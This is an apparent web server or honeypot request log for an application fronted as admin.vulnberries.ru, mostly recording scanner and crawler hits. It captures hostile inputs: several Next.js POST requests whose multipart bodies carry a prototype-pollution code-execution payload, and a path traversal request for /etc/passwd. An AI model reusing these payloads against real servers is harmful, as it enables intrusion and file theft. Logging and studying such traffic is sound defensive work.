Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.194.249.72:50034
Path: /
URL: /
Method: GET
[2026-03-23 17:40:01] === HTTP Request ===
[2026-03-23 17:22:37] Main page accessed - IP: 139.59.97.55:48310
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 139.59.97.55:48310
Path: /
URL: /
Method: GET
[2026-03-23 17:22:37] === HTTP Request ===
[2026-03-23 17:05:50] Main page accessed - IP: 139.59.111.55:42806
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 139.59.111.55:42806
Path: /
URL: /
Method: GET
[2026-03-23 17:05:50] === HTTP Request ===
[2026-03-23 16:39:14] Main page accessed - IP: 139.59.243.96:36468
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 139.59.243.96:36468
Path: /
URL: /
Method: GET
[2026-03-23 16:39:14] === HTTP Request ===
[2026-03-23 15:56:45] Main page accessed - IP: 139.59.116.9:47034
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 139.59.116.9:47034
Path: /
URL: /
Method: GET
[2026-03-23 15:56:45] === HTTP Request ===
[2026-03-23 15:44:24] Main page accessed - IP: 167.172.93.168:47848
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.172.93.168:47848
Path: /
URL: /
Method: GET
[2026-03-23 15:44:24] === HTTP Request ===
[2026-03-23 15:05:46] Main page accessed - IP: 159.89.88.188:49008
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 159.89.88.188:49008
Path: /
URL: /
Method: GET
[2026-03-23 15:05:46] === HTTP Request ===
[2026-03-23 14:19:49] Main page accessed - IP: 172.236.228.220:65002
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 172.236.228.220:65002
Path: /
URL: /
Method: GET
[2026-03-23 14:19:49] === HTTP Request ===
[2026-03-23 14:00:59] Main page accessed - IP: 159.65.42.149:57682
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 159.65.42.149:57682
Path: /
URL: /
Method: GET
[2026-03-23 14:00:59] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.172.143:40100
Path: /security.txt
URL: /security.txt
Method: GET
[2026-03-23 13:42:17] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.172.143:59766
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-23 13:42:13] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.172.143:59752
Path: *
URL: *
Method: PRI
[2026-03-23 13:42:13] === HTTP Request ===
[2026-03-23 13:42:12] Main page accessed - IP: 66.132.172.143:59738
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.172.143:59738
Path: /
URL: /
Method: GET
[2026-03-23 13:42:12] === HTTP Request ===
[2026-03-23 13:42:09] Main page accessed - IP: 66.132.172.143:44228
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.172.143:44228
Path: /
URL: /
Method: GET
[2026-03-23 13:42:09] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.46:61044
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-23 12:12:58] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 162.142.125.46:61036
Path: *
URL: *
Method: PRI
[2026-03-23 12:12:58] === HTTP Request ===
[2026-03-23 12:12:58] Main page accessed - IP: 162.142.125.46:61032
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.46:61032
Path: /
URL: /
Method: GET
[2026-03-23 12:12:58] === HTTP Request ===
[2026-03-23 11:57:38] Main page accessed - IP: 165.22.253.250:33126
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 165.22.253.250:33126
Path: /
URL: /
Method: GET
[2026-03-23 11:57:38] === HTTP Request ===
[2026-03-23 10:57:34] Main page accessed - IP: 172.30.0.12:55660
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 3.139.242.79
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: */*
User-Agent: visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55660
Path: /
URL: /
Method: GET
[2026-03-23 10:57:34] === HTTP Request ===
===================
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate, gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:1506
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-23 10:52:30] === HTTP Request ===
===================
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:62.0) Gecko/20100101 Firefox/62.0
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
Pragma: no-cache
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 65.49.1.193:23015
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-03-23 10:26:27] === HTTP Request ===
[2026-03-23 10:26:12] Main page accessed - IP: 65.49.1.194:55699
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:62.0) Gecko/20100101 Firefox/62.0
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 65.49.1.194:55699
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-03-23 10:26:12] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 65.49.1.194:2867
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-23 10:25:19] === HTTP Request ===
[2026-03-23 10:24:34] Main page accessed - IP: 65.49.1.192:36508
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 65.49.1.192:36508
Path: /
URL: /
Method: GET
[2026-03-23 10:24:34] === HTTP Request ===
===================
Accept: */*
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:48302
Path: /static/salary.js
URL: /static/salary.js
Method: GET
[2026-03-23 09:11:27] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Accept-Encoding: gzip,deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:48326
Path: /static/cabinet.js
URL: /static/cabinet.js
Method: GET
[2026-03-23 09:11:27] === HTTP Request ===
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:48350
Path: /static/goods.js
URL: /static/goods.js
Method: GET
[2026-03-23 09:11:27] === HTTP Request ===
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:48334
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-23 09:11:27] === HTTP Request ===
===================
Accept: */*
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:48314
Path: /static/defects.js
URL: /static/defects.js
Method: GET
[2026-03-23 09:11:27] === HTTP Request ===
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:48350
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-23 09:11:25] === HTTP Request ===
[2026-03-23 09:11:25] Defects page accessed - IP: 64.181.211.198:48302
[2026-03-23 09:11:25] Goods page accessed - IP: 64.181.211.198:48314
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:48302
Path: /defects
URL: /defects
Method: GET
[2026-03-23 09:11:25] === HTTP Request ===
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:48314
Path: /goods
URL: /goods
Method: GET
[2026-03-23 09:11:25] === HTTP Request ===
[2026-03-23 09:11:25] Logs page accessed - IP: 64.181.211.198:48334
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:48334
Path: /logs
URL: /logs
Method: GET
[2026-03-23 09:11:25] === HTTP Request ===
[2026-03-23 09:11:25] Salary page accessed - IP: 64.181.211.198:48326
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:48326
Path: /salary
URL: /salary
Method: GET
[2026-03-23 09:11:25] === HTTP Request ===
[2026-03-23 09:11:25] Login page accessed - IP: 64.181.211.198:48346
[2026-03-23 09:11:25] Cabinet page accessed - user_id: , IP: 64.181.211.198:48296
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:48346
Path: /login
URL: /login
Method: GET
[2026-03-23 09:11:25] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Accept-Encoding: gzip,deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:48296
Path: /cabinet
URL: /cabinet
Method: GET
[2026-03-23 09:11:25] === HTTP Request ===
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:48292
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-23 09:11:25] === HTTP Request ===
[2026-03-23 09:11:25] Main page accessed - IP: 64.181.211.198:48292
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:48292
Path: /
URL: /
Method: GET
[2026-03-23 09:11:25] === HTTP Request ===
[2026-03-23 09:11:25] Main page accessed - IP: 64.181.211.198:48266
===================
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; websiphon/0.2)
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.181.211.198:48266
Path: /
URL: /
Method: HEAD
[2026-03-23 09:11:25] === HTTP Request ===
===================
X-Openai-Host-Hash: 867116608
Via: 2.0 Caddy
From: gptbot(at)openai.com
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.242.49
Referer: https://admin.vulnberries.ru/
Accept-Encoding: gzip, br, deflate
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57534
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-23 08:20:47] === HTTP Request ===
[2026-03-23 08:20:42] Main page accessed - IP: 172.30.0.12:57534
===================
X-Forwarded-Host: admin.vulnberries.ru
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.242.49
Via: 2.0 Caddy
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57534
Path: /
URL: /
Method: GET
[2026-03-23 08:20:42] === HTTP Request ===
===================
Accept: */*
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.244.7
From: oai-searchbot(at)openai.com
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57534
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-23 08:20:39] === HTTP Request ===
[2026-03-23 07:22:18] Main page accessed - IP: 66.228.53.78:53200
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.228.53.78:53200
Path: /
URL: /
Method: GET
[2026-03-23 07:22:18] === HTTP Request ===
[2026-03-23 06:33:46] Main page accessed - IP: 66.228.62.150:46107
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 66.228.62.150:46107
Path: /
URL: /
Method: GET
[2026-03-23 06:33:46] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.140:7227
RemoteAddr: 94.103.188.107:7156
Path:
URL: //185.65.245.140:7227
Method: CONNECT
[2026-03-23 06:16:51] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.13:46486
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-23 05:44:25] === HTTP Request ===
[2026-03-23 05:44:25] Main page accessed - IP: 85.217.140.13:46480
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.13:46480
Path: /
URL: /
Method: GET
[2026-03-23 05:44:25] === HTTP Request ===
[2026-03-23 05:32:11] Main page accessed - IP: 66.228.62.150:55391
===================
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 66.228.62.150:55391
Path: /
URL: /
Method: GET
[2026-03-23 05:32:11] === HTTP Request ===
===================
------WebKitFormBoundaryx710038664533--
------WebKitFormBoundaryx710038664533
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx710038664533
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 276468+true+2568249;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx710038664533
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx710038664533
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_710038664533
X-Nextjs-Request-Id: poop1234
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:60496
Path: /api/route
URL: /api/route
Method: POST
[2026-03-23 05:29:38] === HTTP Request ===
===================
------WebKitFormBoundaryx1508633143954--
------WebKitFormBoundaryx1508633143954
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1508633143954
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 245219+true+6152187;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1508633143954
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1508633143954
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1508633143954
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:60474
Path: /app
URL: /app
Method: POST
[2026-03-23 05:29:33] === HTTP Request ===
===================
------WebKitFormBoundaryx351543913213--
------WebKitFormBoundaryx351543913213
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx351543913213
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 123297+true+2851196;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx351543913213
X-Nextjs-Html-Request-Id: ilovepoop_351543913213
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Connection: close
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx351543913213
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:56814
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-23 05:29:28] === HTTP Request ===
===================
------WebKitFormBoundaryx187624148024--
------WebKitFormBoundaryx187624148024
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx187624148024
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 50999+true+3678977;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx187624148024
X-Nextjs-Html-Request-Id: ilovepoop_187624148024
X-Nextjs-Request-Id: poop1234
Content-Length: 517
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx187624148024
Next-Action: x
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:46196
Path: /api
URL: /api
Method: POST
[2026-03-23 05:29:23] === HTTP Request ===
===================
------WebKitFormBoundaryx1015144855489--
------WebKitFormBoundaryx1015144855489
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1015144855489
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 336192+true+3019539;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1015144855489
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1015144855489
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1015144855489
Next-Action: x
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:46190
Path: /_next
URL: /_next
Method: POST
[2026-03-23 05:29:18] === HTTP Request ===
[2026-03-23 05:29:12] Main page accessed - IP: 45.205.1.18:33366
===================
------WebKitFormBoundaryx80372036081--
------WebKitFormBoundaryx80372036081
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx80372036081
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 78712+true+1021090;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx80372036081
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Content-Length: 513
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx80372036081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_80372036081
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:33366
Path: /
URL: /
Method: POST
[2026-03-23 05:29:12] === HTTP Request ===
[2026-03-23 04:46:45] Main page accessed - IP: 207.90.244.21:47180
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.21:47180
Path: /
URL: /
Method: GET
[2026-03-23 04:46:45] === HTTP Request ===
[2026-03-23 03:45:36] Main page accessed - IP: 147.185.132.231:53675
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 147.185.132.231:53675
Path: /
URL: /
Method: GET
[2026-03-23 03:45:36] === HTTP Request ===
[2026-03-23 02:47:41] Main page accessed - IP: 172.30.0.12:50194
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 204.76.203.25
Via: 1.1 Caddy
Accept-Encoding: identity
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50194
Path: /
URL: /
Method: GET
[2026-03-23 02:47:41] === HTTP Request ===
[2026-03-23 01:48:59] Main page accessed - IP: 172.30.0.12:46238
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 100.50.235.109
Via: 1.1 Caddy
Accept-Encoding: deflate, gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46238
Path: /
URL: /
Method: GET
[2026-03-23 01:48:59] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Connection: close
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 183.81.169.235:2962
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-03-23 01:20:48] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:57400
Path: /jars
URL: /jars
Method: GET
[2026-03-23 00:54:43] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.216:9496
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-22 23:48:43] === HTTP Request ===
[2026-03-22 23:48:41] Login page accessed - IP: 162.142.125.216:9488
===================
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.216:9488
Path: /login
URL: /login
Method: GET
[2026-03-22 23:48:41] === HTTP Request ===
[2026-03-22 22:57:08] Main page accessed - IP: 176.65.149.45:35768
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:35768
Path: /
URL: /
Method: GET
[2026-03-22 22:57:08] === HTTP Request ===
[2026-03-22 22:48:10] Login page accessed - IP: 111.123.41.235:57412
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 111.123.41.235:57412
Path: /login
URL: /login
Method: GET
[2026-03-22 22:48:10] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.120.191.93:38410
Path: /config
URL: /config
Method: GET
[2026-03-22 21:35:43] === HTTP Request ===
[2026-03-22 21:27:05] Main page accessed - IP: 172.30.0.12:55446
===================
Accept-Encoding: gzip
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 198.235.24.136
Via: 1.1 Caddy
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55446
Path: /
URL: /
Method: GET
[2026-03-22 21:27:05] === HTTP Request ===
[2026-03-22 19:35:49] Main page accessed - IP: 198.235.24.126:57742
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 198.235.24.126:57742
Path: /
URL: /
Method: GET
[2026-03-22 19:35:49] === HTTP Request ===
